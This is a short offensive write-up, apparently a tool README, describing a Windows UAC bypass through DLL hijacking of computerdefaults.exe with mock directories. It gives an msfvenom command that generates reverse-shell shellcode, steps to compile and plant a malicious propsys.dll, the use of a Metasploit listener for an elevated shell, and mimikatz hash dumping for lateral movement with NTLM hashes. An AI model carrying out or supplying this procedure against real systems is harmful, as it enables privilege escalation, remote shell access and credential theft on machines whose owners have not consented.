DLL Hijacking and Mock directories technique to bypass Windows UAC security feature and getting high-level privileged reverse shell. Security researchers identified this technique which uses a simplified process of DLL hijacking and mock folders to bypass UAC control. I tested this on Windows 10,11 and bypassed Windows 10 UAC security feature. I am using Metasploit as a C2 server in order to get reverse shell and “computerdefaults.exe” binary to perform DLL hijacking attack. If an attacker got access of that user than he will escalate privileges in order to dump hashes and try to authenticate within network using NTLM hashes of that user. What if an attacker got elevated reverse shell of user, he don’t need to escalate privileges because he already got administrative shell on C2 server.
- Create your shellcode using msfvenom (msfvenom -p windows/x64/shell_reverse_tcp lhost=0.0.0.0 lport=555 -f CSharp)
- Compile Dllmain.cpp to create malicous DLL and rename propsys.dll
- Put propsys.dll and batch file in same directory
- Start Metasploit listener before executing batch script.
- You will get elevated shell over C2 server.
- Load mimikatz in order to dump hashes.
